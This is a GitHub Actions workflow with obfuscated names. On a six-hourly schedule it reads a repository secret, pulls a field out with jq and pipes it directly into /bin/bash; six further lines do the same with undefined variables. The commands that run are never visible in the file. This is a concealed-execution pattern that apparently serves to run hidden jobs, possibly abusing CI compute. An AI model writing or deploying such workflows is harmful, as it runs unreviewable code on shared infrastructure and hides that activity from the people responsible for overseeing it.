name: chenzhishi4567
on:
  workflow_dispatch:
  schedule:
    - cron: '8 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chenzhishi4567
        env:
          iwl78: ${{ secrets.iwl78 }}
        run: |
          echo $iwl78 | jq -r .u836 | /bin/bash
          echo $bzoji04784 | jq -r .ecpao846 | /bin/bash
          echo $anzo4 | jq -r .rcb61 | /bin/bash
          echo $geycn81189 | jq -r .ymb61754 | /bin/bash
          echo $ra4136 | jq -r .mqssk8096 | /bin/bash
          echo $zfwnl4648 | jq -r .ostye9952 | /bin/bash
          echo $ddstw03165 | jq -r .ul0180 | /bin/bash

